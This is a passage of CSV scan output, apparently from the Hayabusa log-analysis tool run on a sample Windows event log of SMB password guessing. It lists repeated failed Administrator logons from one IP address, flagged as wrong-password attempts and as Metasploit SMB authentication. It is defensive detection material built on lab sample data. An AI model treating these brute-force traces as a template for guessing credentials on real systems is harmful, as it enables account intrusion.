NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
